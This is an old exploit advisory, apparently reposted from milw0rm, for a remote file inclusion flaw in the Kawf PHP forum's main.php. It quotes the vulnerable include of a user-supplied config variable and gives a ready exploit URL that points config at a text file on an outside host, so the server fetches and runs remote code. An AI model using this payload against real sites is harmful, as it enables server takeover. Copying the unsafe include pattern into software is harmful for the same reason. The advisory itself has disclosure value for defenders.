kawf (config) Remote File Include

2006-10-23T00:00:00
ID SECURITYVULNS:DOC:14796
Type securityvulns
Reporter Securityvulns
Modified 2006-10-23T00:00:00

Description

kawf (config) Remote File Include

---------------------------------------------------------------------------------------------

Kawf is a web forum written in PHP4 using MySQL

v. 1.0 and all below

--------------------------------------------------------------------------------------------

download :

http://sourceforge.net/projects/kawf

--------------------------------------------------------------------------------------------

see the bug file:

http://koders.com/php/fid2508A4F431485FD5A1154465381E69E592D8D005.aspx?s=require

--------------------------------------------------------------------------------------------

bug in :

main.php

--------------------------------------------------------------------------------------------

code : { i wrote all code for str0ke :D :D } include in line 13 ::

/ First setup the path /

$include_path = "$srcroot/include:$srcroot/user/account";

if (isset($include_append))

$include_path .= ":" . $include_append;

$old_include_path = ini_get("include_path");

if (!empty($old_include_path))

$include_path .= ":" . $old_include_path;

ini_set("include_path", $include_path);

include_once("$config.inc");

require_once("sql.inc");

require_once("util.inc");

require_once("page.inc");

require_once("forumuser.inc");

sql_open($database);

include("index.php");

sql_close();

?>

--------------------------------------------------------------------------------------------

exploit:

kawf/user/account/main.php?config=http://members.lycos.co.uk/o0xxdark0o3/ms.txt?

or

(path)/main.php?config=http://members.lycos.co.uk/o0xxdark0o3/ms.txt?

--------------------------------------------------------------------------

greetz : str0ke , c0ldz3r0 , all members in xp10.cc , dm3r7.com , 4azhar.com all my friend in msn :D

inter_vieri_21 dont play runescape :d :d

-------------------------------------------------------------------------

by o0xxdark0o

i think... so that... i m here

o0xxdark0o@msn.com

milw0rm.com [2006-10-21]